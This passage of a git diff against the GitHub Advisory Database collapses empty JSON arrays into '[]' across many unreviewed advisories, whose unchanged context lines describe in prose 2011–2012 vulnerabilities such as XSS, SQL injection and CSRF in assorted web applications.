"cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-5g5h-vp5m-chrx/GHSA-5g5h-vp5m-chrx.json b/advisories/unreviewed/2022/05/GHSA-5g5h-vp5m-chrx/GHSA-5g5h-vp5m-chrx.json index 11c3f95cd18..9a0c6092399 100644 --- a/advisories/unreviewed/2022/05/GHSA-5g5h-vp5m-chrx/GHSA-5g5h-vp5m-chrx.json +++ b/advisories/unreviewed/2022/05/GHSA-5g5h-vp5m-chrx/GHSA-5g5h-vp5m-chrx.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-5g62-v8vq-wrxx/GHSA-5g62-v8vq-wrxx.json b/advisories/unreviewed/2022/05/GHSA-5g62-v8vq-wrxx/GHSA-5g62-v8vq-wrxx.json index 697b7ad7353..db58189953f 100644 --- a/advisories/unreviewed/2022/05/GHSA-5g62-v8vq-wrxx/GHSA-5g62-v8vq-wrxx.json +++ b/advisories/unreviewed/2022/05/GHSA-5g62-v8vq-wrxx/GHSA-5g62-v8vq-wrxx.json @@ -7,12 +7,8 @@ "CVE-2012-2132" ], "details": "libsoup 2.32.2 and earlier does not validate certificates or clear the trust flag when the ssl-ca-file does not exist, which allows remote attackers to bypass authentication by connecting with a SSL connection.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-5h27-5vmq-pxwf/GHSA-5h27-5vmq-pxwf.json b/advisories/unreviewed/2022/05/GHSA-5h27-5vmq-pxwf/GHSA-5h27-5vmq-pxwf.json index c58ef359b28..739cca0ce6d 100644 --- a/advisories/unreviewed/2022/05/GHSA-5h27-5vmq-pxwf/GHSA-5h27-5vmq-pxwf.json +++ b/advisories/unreviewed/2022/05/GHSA-5h27-5vmq-pxwf/GHSA-5h27-5vmq-pxwf.json @@ -7,12 +7,8 @@ "CVE-2012-3828" ], "details": "Cross-site scripting (XSS) vulnerability in Joomla! 2.5.3 allows remote attackers to inject arbitrary web script or HTML via the Host HTTP Header.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-5hfx-9rcx-q4hq/GHSA-5hfx-9rcx-q4hq.json b/advisories/unreviewed/2022/05/GHSA-5hfx-9rcx-q4hq/GHSA-5hfx-9rcx-q4hq.json index 1232d7784c0..67014654c63 100644 --- a/advisories/unreviewed/2022/05/GHSA-5hfx-9rcx-q4hq/GHSA-5hfx-9rcx-q4hq.json +++ b/advisories/unreviewed/2022/05/GHSA-5hfx-9rcx-q4hq/GHSA-5hfx-9rcx-q4hq.json @@ -7,12 +7,8 @@ "CVE-2012-3096" ], "details": "Cisco Unity Connection (UC) 7.1, 8.0, and 8.5 allows remote authenticated users to cause a denial of service (resource consumption and administration outage) via extended use of the product, aka Bug ID CSCtd79132.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -28,9 +24,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-5hjh-92hw-gcx5/GHSA-5hjh-92hw-gcx5.json b/advisories/unreviewed/2022/05/GHSA-5hjh-92hw-gcx5/GHSA-5hjh-92hw-gcx5.json index a90faf3c73e..1d0036d799f 100644 --- a/advisories/unreviewed/2022/05/GHSA-5hjh-92hw-gcx5/GHSA-5hjh-92hw-gcx5.json +++ b/advisories/unreviewed/2022/05/GHSA-5hjh-92hw-gcx5/GHSA-5hjh-92hw-gcx5.json @@ -7,12 +7,8 @@ "CVE-2012-2712" ], "details": "Multiple cross-site scripting (XSS) vulnerabilities in the Search API module 7.x-1.x before 7.x-1.1 for Drupal, when supporting manual entry of field identifiers, allow remote attackers to inject arbitrary web script or HTML via vectors related to thrown exceptions and logging errors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-5hvx-fqqf-mwpp/GHSA-5hvx-fqqf-mwpp.json b/advisories/unreviewed/2022/05/GHSA-5hvx-fqqf-mwpp/GHSA-5hvx-fqqf-mwpp.json index 82bb8189eef..4adaa7c3025 100644 --- a/advisories/unreviewed/2022/05/GHSA-5hvx-fqqf-mwpp/GHSA-5hvx-fqqf-mwpp.json +++ b/advisories/unreviewed/2022/05/GHSA-5hvx-fqqf-mwpp/GHSA-5hvx-fqqf-mwpp.json @@ -7,12 +7,8 @@ "CVE-2012-4061" ], "details": "Multiple SQL injection vulnerabilities in ASP-DEv XM Diary allow remote attackers to execute arbitrary SQL commands via the (1) id parameter to diary_view.asp or (2) view_date parameter to default.asp.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-5j3c-768x-m8c6/GHSA-5j3c-768x-m8c6.json b/advisories/unreviewed/2022/05/GHSA-5j3c-768x-m8c6/GHSA-5j3c-768x-m8c6.json index 70a12c80343..7d676386702 100644 --- a/advisories/unreviewed/2022/05/GHSA-5j3c-768x-m8c6/GHSA-5j3c-768x-m8c6.json +++ b/advisories/unreviewed/2022/05/GHSA-5j3c-768x-m8c6/GHSA-5j3c-768x-m8c6.json @@ -7,12 +7,8 @@ "CVE-2012-2670" ], "details": "manageuser.php in Collabtive before 0.7.6 allows remote authenticated users, and possibly unauthenticated attackers, to bypass intended access restrictions and upload and execute arbitrary files by uploading an avatar file with an accepted Content-Type such as image/jpeg, then accessing it via a direct request to the file in files/standard/avatar.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-5jxm-f54p-34xg/GHSA-5jxm-f54p-34xg.json b/advisories/unreviewed/2022/05/GHSA-5jxm-f54p-34xg/GHSA-5jxm-f54p-34xg.json index 60fe9876874..5a143142a3d 100644 --- a/advisories/unreviewed/2022/05/GHSA-5jxm-f54p-34xg/GHSA-5jxm-f54p-34xg.json +++ b/advisories/unreviewed/2022/05/GHSA-5jxm-f54p-34xg/GHSA-5jxm-f54p-34xg.json @@ -7,12 +7,8 @@ "CVE-2012-2061" ], "details": "Cross-site request forgery (CSRF) vulnerability in the Admin tools module for Drupal allows remote attackers to hijack the authentication of unspecified victims via unknown vectors involving \"not checking tokens.\"", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-5p8c-3w47-xggf/GHSA-5p8c-3w47-xggf.json b/advisories/unreviewed/2022/05/GHSA-5p8c-3w47-xggf/GHSA-5p8c-3w47-xggf.json index 82f0ee48445..f858b5e109a 100644 --- a/advisories/unreviewed/2022/05/GHSA-5p8c-3w47-xggf/GHSA-5p8c-3w47-xggf.json +++ b/advisories/unreviewed/2022/05/GHSA-5p8c-3w47-xggf/GHSA-5p8c-3w47-xggf.json @@ -7,12 +7,8 @@ "CVE-2012-0746" ], "details": "Cross-site scripting (XSS) vulnerability in IBM Maximo Asset Management 7.5, as used in SmartCloud Control Desk, Tivoli Asset Management for IT, Tivoli Service Request Manager, Maximo Service Desk, and Change and Configuration Management Database (CCMDB), allows remote authenticated users to inject arbitrary web script or HTML via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-5pf8-m5c6-qc44/GHSA-5pf8-m5c6-qc44.json b/advisories/unreviewed/2022/05/GHSA-5pf8-m5c6-qc44/GHSA-5pf8-m5c6-qc44.json index 2e2b0121595..70935ed4231 100644 --- a/advisories/unreviewed/2022/05/GHSA-5pf8-m5c6-qc44/GHSA-5pf8-m5c6-qc44.json +++ b/advisories/unreviewed/2022/05/GHSA-5pf8-m5c6-qc44/GHSA-5pf8-m5c6-qc44.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-5q6p-qrmq-r3hp/GHSA-5q6p-qrmq-r3hp.json b/advisories/unreviewed/2022/05/GHSA-5q6p-qrmq-r3hp/GHSA-5q6p-qrmq-r3hp.json index ab40c6b5bcf..cc6558a0e68 100644 --- a/advisories/unreviewed/2022/05/GHSA-5q6p-qrmq-r3hp/GHSA-5q6p-qrmq-r3hp.json +++ b/advisories/unreviewed/2022/05/GHSA-5q6p-qrmq-r3hp/GHSA-5q6p-qrmq-r3hp.json @@ -7,12 +7,8 @@ "CVE-2012-3258" ], "details": "Unspecified vulnerability in HP Operations Orchestration 9.0 before 9.03 allows remote attackers to execute arbitrary code via unknown vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -32,9 +28,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-5q77-9538-2mfh/GHSA-5q77-9538-2mfh.json b/advisories/unreviewed/2022/05/GHSA-5q77-9538-2mfh/GHSA-5q77-9538-2mfh.json index 3f529d6eb99..96dc6e2ea3e 100644 --- a/advisories/unreviewed/2022/05/GHSA-5q77-9538-2mfh/GHSA-5q77-9538-2mfh.json +++ b/advisories/unreviewed/2022/05/GHSA-5q77-9538-2mfh/GHSA-5q77-9538-2mfh.json @@ -7,12 +7,8 @@ "CVE-2012-2702" ], "details": "The Ubercart Product Keys module 6.x-1.x before 6.x-1.1 for Drupal does not properly check access for product keys, which allows remote attackers to read all unassigned product keys via certain conditions related to the uid.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -48,9 +44,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-5qgf-p5r6-q832/GHSA-5qgf-p5r6-q832.json b/advisories/unreviewed/2022/05/GHSA-5qgf-p5r6-q832/GHSA-5qgf-p5r6-q832.json index d520e4e1b72..d2185e13ed0 100644 --- a/advisories/unreviewed/2022/05/GHSA-5qgf-p5r6-q832/GHSA-5qgf-p5r6-q832.json +++ b/advisories/unreviewed/2022/05/GHSA-5qgf-p5r6-q832/GHSA-5qgf-p5r6-q832.json @@ -7,12 +7,8 @@ "CVE-2012-2916" ], "details": "Cross-site scripting (XSS) vulnerability in sabre_class_admin.php in the SABRE plugin before 2.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the active_option parameter to wp-admin/tools.php.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-5r5j-787w-2q4w/GHSA-5r5j-787w-2q4w.json b/advisories/unreviewed/2022/05/GHSA-5r5j-787w-2q4w/GHSA-5r5j-787w-2q4w.json index c8c96635977..f648169d306 100644 --- a/advisories/unreviewed/2022/05/GHSA-5r5j-787w-2q4w/GHSA-5r5j-787w-2q4w.json +++ b/advisories/unreviewed/2022/05/GHSA-5r5j-787w-2q4w/GHSA-5r5j-787w-2q4w.json @@ -7,12 +7,8 @@ "CVE-2012-1214" ], "details": "Cross-site scripting (XSS) vulnerability in the Add friends module in Yoono Desktop Application before 1.8.21 allows remote attackers to inject arbitrary web script or HTML via the create field in a \"Create a group\" action.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-5v8q-7pvx-r4g5/GHSA-5v8q-7pvx-r4g5.json b/advisories/unreviewed/2022/05/GHSA-5v8q-7pvx-r4g5/GHSA-5v8q-7pvx-r4g5.json index 716223ee2b7..401e47774bc 100644 --- a/advisories/unreviewed/2022/05/GHSA-5v8q-7pvx-r4g5/GHSA-5v8q-7pvx-r4g5.json +++ b/advisories/unreviewed/2022/05/GHSA-5v8q-7pvx-r4g5/GHSA-5v8q-7pvx-r4g5.json @@ -7,12 +7,8 @@ "CVE-2012-3324" ], "details": "Directory traversal vulnerability in the UTL_FILE module in IBM DB2 and DB2 Connect 10.1 before FP1 on Windows allows remote authenticated users to modify, delete, or read arbitrary files via a pathname in the file field.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-5vgc-qp88-vfrj/GHSA-5vgc-qp88-vfrj.json b/advisories/unreviewed/2022/05/GHSA-5vgc-qp88-vfrj/GHSA-5vgc-qp88-vfrj.json index 38a04aa352d..97a004a3152 100644 --- a/advisories/unreviewed/2022/05/GHSA-5vgc-qp88-vfrj/GHSA-5vgc-qp88-vfrj.json +++ b/advisories/unreviewed/2022/05/GHSA-5vgc-qp88-vfrj/GHSA-5vgc-qp88-vfrj.json @@ -7,12 +7,8 @@ "CVE-2012-1502" ], "details": "Double free vulnerability in the PyPAM_conv in PAMmodule.c in PyPam 0.5.0 and earlier allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a NULL byte in a password string.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -60,9 +56,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-5vhm-9jjq-c5j7/GHSA-5vhm-9jjq-c5j7.json b/advisories/unreviewed/2022/05/GHSA-5vhm-9jjq-c5j7/GHSA-5vhm-9jjq-c5j7.json index 176979d61d0..006890f8c2d 100644 --- a/advisories/unreviewed/2022/05/GHSA-5vhm-9jjq-c5j7/GHSA-5vhm-9jjq-c5j7.json +++ b/advisories/unreviewed/2022/05/GHSA-5vhm-9jjq-c5j7/GHSA-5vhm-9jjq-c5j7.json @@ -7,12 +7,8 @@ "CVE-2011-5209" ], "details": "Cross-site scripting (XSS) vulnerability in search/ in GraphicsClone Script, possibly 1.11, allows remote attackers to inject arbitrary web script or HTML via the term parameter.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-5vx7-3cmr-jg43/GHSA-5vx7-3cmr-jg43.json b/advisories/unreviewed/2022/05/GHSA-5vx7-3cmr-jg43/GHSA-5vx7-3cmr-jg43.json index 768c0d08aef..f30833b33da 100644 --- a/advisories/unreviewed/2022/05/GHSA-5vx7-3cmr-jg43/GHSA-5vx7-3cmr-jg43.json +++ b/advisories/unreviewed/2022/05/GHSA-5vx7-3cmr-jg43/GHSA-5vx7-3cmr-jg43.json @@ -7,12 +7,8 @@ "CVE-2012-1414" ], "details": "Cross-site request forgery (CSRF) vulnerability in manager/news.php in Plume CMS 1.2.4 and earlier allows remote attackers to hijack the authentication of administrators for requests that create News pages via a publish action.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-5wqw-6333-5244/GHSA-5wqw-6333-5244.json b/advisories/unreviewed/2022/05/GHSA-5wqw-6333-5244/GHSA-5wqw-6333-5244.json index fd0cbc01c24..c24cd8f562a 100644 --- a/advisories/unreviewed/2022/05/GHSA-5wqw-6333-5244/GHSA-5wqw-6333-5244.json +++ b/advisories/unreviewed/2022/05/GHSA-5wqw-6333-5244/GHSA-5wqw-6333-5244.json @@ -7,12 +7,8 @@ "CVE-2012-0988" ], "details": "Multiple cross-site scripting (XSS) vulnerabilities in config/dmsDefaults.php in KnowledgeTree 3.7.0.2 and possibly earlier allow remote attackers to inject arbitrary web script or HTML via the PATH_INFO to (1) login.php, (2) admin.php, or (3) preferences.php.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-5x97-c6r4-fxj7/GHSA-5x97-c6r4-fxj7.json b/advisories/unreviewed/2022/05/GHSA-5x97-c6r4-fxj7/GHSA-5x97-c6r4-fxj7.json index b894150b91d..11deeae797b 100644 --- a/advisories/unreviewed/2022/05/GHSA-5x97-c6r4-fxj7/GHSA-5x97-c6r4-fxj7.json +++ b/advisories/unreviewed/2022/05/GHSA-5x97-c6r4-fxj7/GHSA-5x97-c6r4-fxj7.json @@ -7,12 +7,8 @@ "CVE-2012-2908" ], "details": "Multiple SQL injection vulnerabilities in admin/bbcodes.php in Viscacha 0.8.1.1 allow remote attackers to execute arbitrary SQL commands via the (1) bbcodeexample, (2) buttonimage, or (3) bbcodetag parameter.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-5xf2-6qpg-8569/GHSA-5xf2-6qpg-8569.json b/advisories/unreviewed/2022/05/GHSA-5xf2-6qpg-8569/GHSA-5xf2-6qpg-8569.json index 4171eef1c16..f25e0d9c01c 100644 --- a/advisories/unreviewed/2022/05/GHSA-5xf2-6qpg-8569/GHSA-5xf2-6qpg-8569.json +++ b/advisories/unreviewed/2022/05/GHSA-5xf2-6qpg-8569/GHSA-5xf2-6qpg-8569.json @@ -7,12 +7,8 @@ "CVE-2012-3319" ], "details": "IBM Rational Business Developer 8.x before 8.0.1.4 allows remote attackers to obtain potentially sensitive information via a connection to a web service created with the Rational Business Developer product.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-5xw7-vh5g-vh38/GHSA-5xw7-vh5g-vh38.json b/advisories/unreviewed/2022/05/GHSA-5xw7-vh5g-vh38/GHSA-5xw7-vh5g-vh38.json index 14dc54d149b..555108c582f 100644 --- a/advisories/unreviewed/2022/05/GHSA-5xw7-vh5g-vh38/GHSA-5xw7-vh5g-vh38.json +++ b/advisories/unreviewed/2022/05/GHSA-5xw7-vh5g-vh38/GHSA-5xw7-vh5g-vh38.json @@ -7,12 +7,8 @@ "CVE-2012-2063" ], "details": "The Slidebox module before 7.x-1.4 for Drupal does not properly check permissions, which allows remote attackers to obtain sensitive information via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -48,9 +44,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-623g-v3mq-x97w/GHSA-623g-v3mq-x97w.json b/advisories/unreviewed/2022/05/GHSA-623g-v3mq-x97w/GHSA-623g-v3mq-x97w.json index eff694c2cca..b68b39af39e 100644 --- a/advisories/unreviewed/2022/05/GHSA-623g-v3mq-x97w/GHSA-623g-v3mq-x97w.json +++ b/advisories/unreviewed/2022/05/GHSA-623g-v3mq-x97w/GHSA-623g-v3mq-x97w.json @@ -7,12 +7,8 @@ "CVE-2012-1780" ], "details": "SQL injection vulnerability in search.php in SocialCMS 1.0.5 allows remote attackers to execute arbitrary SQL commands via the category parameter.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-62fh-wmvw-563c/GHSA-62fh-wmvw-563c.json b/advisories/unreviewed/2022/05/GHSA-62fh-wmvw-563c/GHSA-62fh-wmvw-563c.json index f322495e882..0389a35b37b 100644 --- a/advisories/unreviewed/2022/05/GHSA-62fh-wmvw-563c/GHSA-62fh-wmvw-563c.json +++ b/advisories/unreviewed/2022/05/GHSA-62fh-wmvw-563c/GHSA-62fh-wmvw-563c.json @@ -7,12 +7,8 @@ "CVE-2012-2068" ], "details": "Multiple cross-site scripting (XSS) vulnerabilities in fancy_slide.module in the Fancy Slide module before 6.x-2.7 for Drupal allow remote authenticated users with the administer fancy_slide permission to inject arbitrary web script or HTML via the (1) node_title or (2) nodequeue_title parameter.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-62gm-hh6p-wrqw/GHSA-62gm-hh6p-wrqw.json b/advisories/unreviewed/2022/05/GHSA-62gm-hh6p-wrqw/GHSA-62gm-hh6p-wrqw.json index bc1f4e7f9a0..8111f17fc82 100644 --- a/advisories/unreviewed/2022/05/GHSA-62gm-hh6p-wrqw/GHSA-62gm-hh6p-wrqw.json +++ b/advisories/unreviewed/2022/05/GHSA-62gm-hh6p-wrqw/GHSA-62gm-hh6p-wrqw.json @@ -7,12 +7,8 @@ "CVE-2012-1624" ], "details": "Multiple cross-site scripting (XSS) vulnerabilities in the Lingotek module 6.x-1.x before 6.x-1.40 for Drupal allow remote authenticated users to inject arbitrary web script or HTML when (1) creating or (2) editing page content.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-62jw-6946-v2hx/GHSA-62jw-6946-v2hx.json b/advisories/unreviewed/2022/05/GHSA-62jw-6946-v2hx/GHSA-62jw-6946-v2hx.json index 9bb3c355c64..7c920c5b9da 100644 --- a/advisories/unreviewed/2022/05/GHSA-62jw-6946-v2hx/GHSA-62jw-6946-v2hx.json +++ b/advisories/unreviewed/2022/05/GHSA-62jw-6946-v2hx/GHSA-62jw-6946-v2hx.json @@ -7,12 +7,8 @@ "CVE-2012-2937" ], "details": "Multiple SQL injection vulnerabilities in Pligg CMS before 1.2.2 allow remote attackers to execute arbitrary SQL commands via the (1) list parameter in a move action to admin/admin_index.php, (2) display parameter in a minimize action to admin/admin_index.php, (3) enabled[] parameter to admin/admin_users.php, or (4) msg_id to the module.php in the simple_messaging module.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-62v9-8446-g2pq/GHSA-62v9-8446-g2pq.json b/advisories/unreviewed/2022/05/GHSA-62v9-8446-g2pq/GHSA-62v9-8446-g2pq.json index b5ae0b70044..6852422cd72 100644 --- a/advisories/unreviewed/2022/05/GHSA-62v9-8446-g2pq/GHSA-62v9-8446-g2pq.json +++ b/advisories/unreviewed/2022/05/GHSA-62v9-8446-g2pq/GHSA-62v9-8446-g2pq.json @@ -7,12 +7,8 @@ "CVE-2012-3567" ], "details": "Opera before 12.00 Beta allows remote attackers to cause a denial of service (memory consumption or application hang) via an IFRAME element that uses the src=\"#\" syntax to embed a parent document.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -28,9 +24,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-63m8-v7w4-mcq7/GHSA-63m8-v7w4-mcq7.json b/advisories/unreviewed/2022/05/GHSA-63m8-v7w4-mcq7/GHSA-63m8-v7w4-mcq7.json index eaaed0c6f24..ee5d7190bfa 100644 --- a/advisories/unreviewed/2022/05/GHSA-63m8-v7w4-mcq7/GHSA-63m8-v7w4-mcq7.json +++ b/advisories/unreviewed/2022/05/GHSA-63m8-v7w4-mcq7/GHSA-63m8-v7w4-mcq7.json @@ -7,12 +7,8 @@ "CVE-2012-0741" ], "details": "IBM Security AppScan Enterprise before 8.6.0.2 and Rational Policy Tester before 8.5.0.3 do not validate X.509 certificates during use of the Manual Explore Proxy feature, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary certificate.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-6479-42hp-fcpg/GHSA-6479-42hp-fcpg.json b/advisories/unreviewed/2022/05/GHSA-6479-42hp-fcpg/GHSA-6479-42hp-fcpg.json index 035fb7178b4..ebe6c12d15a 100644 --- a/advisories/unreviewed/2022/05/GHSA-6479-42hp-fcpg/GHSA-6479-42hp-fcpg.json +++ b/advisories/unreviewed/2022/05/GHSA-6479-42hp-fcpg/GHSA-6479-42hp-fcpg.json @@ -7,12 +7,8 @@ "CVE-2012-0995" ], "details": "Multiple cross-site scripting (XSS) vulnerabilities in ZENphoto 1.4.2 allow remote attackers to inject arbitrary web script or HTML via the (1) msg parameter in an external action to zp-core/admin.php, (2) PATH_INTO to an unspecified URL, as demonstrated using /1/, (3) PATH_INFO to zp-core/admin.php, or (4) album parameter to zp-core/admin-edit.php.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-648f-mvj9-qmhq/GHSA-648f-mvj9-qmhq.json b/advisories/unreviewed/2022/05/GHSA-648f-mvj9-qmhq/GHSA-648f-mvj9-qmhq.json index d7366ac46cc..1c373705026 100644 --- a/advisories/unreviewed/2022/05/GHSA-648f-mvj9-qmhq/GHSA-648f-mvj9-qmhq.json +++ b/advisories/unreviewed/2022/05/GHSA-648f-mvj9-qmhq/GHSA-648f-mvj9-qmhq.json @@ -7,12 +7,8 @@ "CVE-2012-2171" ], "details": "SQL injection vulnerability in ModuleServlet.do in the Storage Manager Profiler in IBM System Storage DS Storage Manager before 10.83.xx.18 on DS Series devices allows remote authenticated users to execute arbitrary SQL commands via the selectedModuleOnly parameter in a state_viewmodulelog action to the ModuleServlet URI.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-64v8-p3x2-mg79/GHSA-64v8-p3x2-mg79.json b/advisories/unreviewed/2022/05/GHSA-64v8-p3x2-mg79/GHSA-64v8-p3x2-mg79.json index d3808e8b04d..3a0e2aafcd8 100644 --- a/advisories/unreviewed/2022/05/GHSA-64v8-p3x2-mg79/GHSA-64v8-p3x2-mg79.json +++ b/advisories/unreviewed/2022/05/GHSA-64v8-p3x2-mg79/GHSA-64v8-p3x2-mg79.json @@ -7,12 +7,8 @@ "CVE-2012-0935" ], "details": "SQL injection vulnerability in Default.aspx in Aryadad CMS allows remote attackers to execute arbitrary SQL commands via the PageID parameter.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-65c5-3vj4-jjjq/GHSA-65c5-3vj4-jjjq.json b/advisories/unreviewed/2022/05/GHSA-65c5-3vj4-jjjq/GHSA-65c5-3vj4-jjjq.json index fe5004b10b9..7d6ade0e183 100644 --- a/advisories/unreviewed/2022/05/GHSA-65c5-3vj4-jjjq/GHSA-65c5-3vj4-jjjq.json +++ b/advisories/unreviewed/2022/05/GHSA-65c5-3vj4-jjjq/GHSA-65c5-3vj4-jjjq.json @@ -7,12 +7,8 @@ "CVE-2012-2711" ], "details": "Multiple cross-site scripting (XSS) vulnerabilities in the Taxonomy List module 6.x-1.x before 6.x-1.4 for Drupal allow remote authenticated users with create or edit taxonomy terms permissions to inject arbitrary web script or HTML via vectors related to taxonomy information.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-65hj-j59j-72pr/GHSA-65hj-j59j-72pr.json b/advisories/unreviewed/2022/05/GHSA-65hj-j59j-72pr/GHSA-65hj-j59j-72pr.json index 7f1414ef533..f5596a53947 100644 --- a/advisories/unreviewed/2022/05/GHSA-65hj-j59j-72pr/GHSA-65hj-j59j-72pr.json +++ b/advisories/unreviewed/2022/05/GHSA-65hj-j59j-72pr/GHSA-65hj-j59j-72pr.json @@ -7,12 +7,8 @@ "CVE-2011-5222" ], "details": "SQL injection vulnerability in rub2_w.php in PHP Flirt-Projekt 4.8 and possibly earlier allows remote attackers to execute arbitrary SQL commands via the rub parameter.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-67rj-rmm8-3hm6/GHSA-67rj-rmm8-3hm6.json b/advisories/unreviewed/2022/05/GHSA-67rj-rmm8-3hm6/GHSA-67rj-rmm8-3hm6.json index e114dfa4e63..f72338e80b0 100644 --- a/advisories/unreviewed/2022/05/GHSA-67rj-rmm8-3hm6/GHSA-67rj-rmm8-3hm6.json +++ b/advisories/unreviewed/2022/05/GHSA-67rj-rmm8-3hm6/GHSA-67rj-rmm8-3hm6.json @@ -7,12 +7,8 @@ "CVE-2012-0980" ], "details": "SQL injection vulnerability in download.php in phux Download Manager allows remote attackers to execute arbitrary SQL commands via the file parameter.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-67ww-jmxf-h84x/GHSA-67ww-jmxf-h84x.json b/advisories/unreviewed/2022/05/GHSA-67ww-jmxf-h84x/GHSA-67ww-jmxf-h84x.json index 9364893805f..6e7b645a8f9 100644 --- 